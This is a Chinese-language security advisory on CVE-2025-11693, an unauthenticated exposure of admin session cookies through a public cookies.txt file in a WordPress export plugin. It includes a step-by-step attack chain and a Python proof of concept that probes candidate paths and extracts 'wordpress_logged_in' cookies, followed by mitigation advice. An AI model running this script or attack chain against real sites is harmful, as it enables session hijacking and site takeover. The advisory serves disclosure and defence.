CVE-2025-11693 WordPress Export插件敏感信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-11693

漏洞类型

敏感信息泄露

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Export WP Page to Static HTML & PDF (WordPress插件)

漏洞概述

CVE-2025-11693是WordPress插件"Export WP Page to Static HTML & PDF"中的一个高危敏感信息泄露漏洞。该插件在所有版本直至4.3.4版本中，存在通过公开访问的cookies.txt文件暴露敏感认证信息的问题。攻击者无需任何认证即可访问这些文件，如果网站管理员使用特定用户角色（如管理员）触发备份操作，认证cookie可能被注入到日志文件中。攻击者可利用获取的会话cookie劫持管理员会话，进而在WordPress网站上执行恶意操作，包括上传恶意插件、修改内容或获取数据库访问权限。此漏洞CVSS评分高达9.8，属于严重级别，对使用该插件的所有WordPress网站构成重大威胁。

技术细节

该漏洞源于Export WP Page to Static HTML & PDF插件在执行页面导出和静态HTML/PDF生成功能时，错误地将包含认证cookie的信息写入可公开访问的文件中。具体而言，当管理员使用该插件的备份功能导出页面时，系统会生成cookies.txt文件用于存储会话信息。如果攻击者直接访问该文件的URL路径（例如：/cookies.txt或插件目录下的特定路径），即可获取包含有效认证会话的cookie数据。攻击者随后可以将这些cookie复制到自己的浏览器中，通过会话劫持冒充管理员身份。由于该插件未对cookies.txt文件实施任何访问控制或加密保护，且cookie数据以明文形式存储，任何知道文件路径的攻击者都可以直接下载。由于插件在备份过程中会使用管理员权限执行操作，因此泄露的cookie可能具有完整的WordPress后台管理权限。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站是否安装并启用Export WP Page to Static HTML & PDF插件，可通过网站指纹识别或检查插件目录特征

STEP 2

步骤2: 探测暴露端点

攻击者尝试访问可能的cookies.txt文件路径，如/wp-content/plugins/export-wp-page-to-static-html/cookies.txt等常见路径

STEP 3

步骤3: 获取认证Cookie

如果管理员近期使用该插件执行过备份操作，攻击者可直接下载包含管理员会话cookie的文件内容

STEP 4

步骤4: 会话劫持

攻击者将获取的cookie设置到自己的浏览器中，冒充管理员身份登录WordPress后台

STEP 5

步骤5: 权限滥用

攻击者以管理员权限执行恶意操作，如上传恶意插件、修改主题文件、安装后门或导出数据库内容

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11693 PoC - Cookie File Access
# Affected: Export WP Page to Static HTML & PDF <= 4.3.4

import requests
import re

target_url = "http://target-wordpress-site.com"

# Common paths where cookies.txt might be exposed
cookie_paths = [
    "/wp-content/plugins/export-wp-page-to-static-html/cookies.txt",
    "/wp-content/uploads/cookies.txt",
    "/cookies.txt",
    "/wp-content/cookies.txt",
    "/export-wp-page-to-static-html/cookies.txt"
]

def check_cookie_exposure():
    print("[*] Checking for exposed cookies.txt files...")
    for path in cookie_paths:
        url = target_url + path
        try:
            response = requests.get(url, timeout=10)
            if response.status_code == 200 and len(response.text) > 0:
                if "wordpress_logged_in" in response.text or "wordpress_sec_" in response.text:
                    print(f"[!] VULNERABLE: Found exposed cookie file at {url}")
                    print(f"[+] Content preview: {response.text[:500]}")
                    
                    # Extract cookies
                    cookies = re.findall(r'(wordpress_logged_in_[^=]+=[^;]+)', response.text)
                    for cookie in cookies:
                        print(f"[*] Cookie: {cookie}")
                    return True
        except requests.RequestException as e:
            print(f"[-] Error accessing {url}: {e}")
    return False

if __name__ == "__main__":
    check_cookie_exposure()

影响范围

Export WP Page to Static HTML & PDF <= 4.3.4

防御指南

临时缓解措施

在完成版本升级前，建议临时禁用Export WP Page to Static HTML & PDF插件，同时检查并删除服务器上所有cookies.txt文件。由于cookie可能已被攻击者获取，应强制所有管理员账户重置密码并生成新的认证会话。此外，建议在Web服务器配置中禁止访问插件目录下的.txt文件，或对敏感路径实施访问日志监控。